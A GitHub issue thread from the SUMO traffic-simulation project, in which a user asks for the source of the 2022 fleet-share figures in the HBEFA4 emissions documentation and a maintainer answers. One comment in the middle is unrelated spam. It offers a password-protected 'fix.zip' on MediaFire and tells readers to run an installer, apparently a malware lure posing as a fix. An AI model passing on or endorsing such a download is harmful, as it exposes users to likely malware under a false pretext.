### ISSUE TITLE
Fleet share of HBEFA

### ISSUE THREAD

**Issue by Domsall** [eclipse-sumo/sumo#15402]
@behrisch In the documentation about HBEFA4 (https://sumo.dlr.de/docs/Models/Emissions/HBEFA4-based.html), you write about the fleet share 2022. Could you provide a source where these numbers come from? German KBA? I cannot find the source in the HBEFA documentation.

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by namdre** [comment]
@piwagner can you help?

**Comment by namdre** [comment]
The short answer is: `The vehicle fleets are under (starting from the main screen)  Info > Fleet compositions. `

I've forwarded the longer answer directly to your email.
